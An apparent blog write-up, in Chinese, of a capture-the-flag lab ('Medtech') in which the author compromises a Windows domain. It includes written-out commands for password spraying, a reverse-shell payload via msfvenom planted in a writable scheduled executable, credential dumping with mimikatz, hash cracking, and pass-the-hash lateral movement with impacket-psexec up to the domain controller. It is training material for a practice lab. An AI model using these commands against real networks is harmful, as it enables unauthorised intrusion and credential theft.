Challenge 1 - Medtech(4)
Challenge 1 - Medtech(4)
之前跑 BloodHound 發現 DEV04 看來是個有效入侵到 DC 的好跳板
因為在該機器上有個 Leon 的 Session,所以將下一步攻擊順序放在這一台
直接用現有的帳號密碼噴灑試試看
└─$ proxychains4 -q crackmapexec smb 172.16.155.12 -u ./usernames.txt -p ./passwords.txt --continue-on-success
將 LAB 重開單獨測試目前已知的另外一組網域帳號 wario 試試看
一樣有用但不是管理者
多做幾次測試後發現網域帳號 yoshi 的密碼也是 Mushroom!
隨手好習慣先更新一下帳號密碼表
接著在列舉與測試時要多種列舉,發現 .12 有開 RDP
結果使用者帳號 yoshi:Mushroom! RDP 直接進去了,沒有做不到只有想不到
└─$ proxychains4 xfreerdp /u:yoshi /d:medtech.com /v:172.16.155.12:3389 /p:'Mushroom!'
拿到 local.txt flag
PE 發現在 C:\ 路徑下有一個 TEMP 資料夾,裡面有一個 backup.exe
查看一下權限 icacls backup.exe 發現有 (M) 的權限
標準作業建立 Payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=4445 -f exe -b '\x00\x0d\x0a' -o backup.exe
重新命名 backup.exe 再上傳 payload
結果 4445 listener 進來了,看來 backup.exe 是固定時間執行的
whoami 確認是管理者後拿 flag
更新一下攻擊列表
上傳 mimikatz.exe 並執行 privilege::debug、sekurlsa::logonpasswords
看到 yoshi 的 HASH 跟 wario 一樣,因為兩個的密碼都是 Mushroom!
發現 leon 的 HASH "2e208ad146efda5bc44869025e06544a"
hashcat 破不出來,獲得 $HEX[7261626269743a29]
這時候可以用進階的工具再爆破看看,標及一個文字檔如下
leon:$HEX[7261626269743a29]
然後使用 hexcat.py 解看看,參考 : https://github.com/ins1gn1a/Hexcat/blob/master/hexcat.py
密碼解出來了是 "rabbit:)"
更新一下現在的密碼表
已經拿到了 Domain Admin "Leon" 的 HASH 與密碼,那就直接測試看看吧
將目標朝向 CLIENT01(.82)
impacket-psexec 帶 HASH 直接進去看看,└─$ proxychains4 -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.185.82
這一台僅有 proof.txt
拿下 CLIENT01,下一台 CLIENT02
下一台 83 改用密碼進去看看
└─$ proxychains4 -q impacket-psexec leon:'rabbit:)'@172.16.185.83
拿 flag,這一台兩個 flag 都有
更新攻擊列表,完成 CLIENT02,下一台內網的 Windows .13
└─$ proxychains4 -q impacket-psexec leon:'rabbit:)'@172.16.185.13
更新攻擊列表,完成 .13 PROD01,下一台直接進 DC
└─$ proxychains4 -q impacket-psexec leon:'rabbit:)'@172.16.185.10
更新攻擊列表,至此我們完成了所有的 Windows 機器
剩下外網一台 Linux 與內網一台 Linux
留言
張貼留言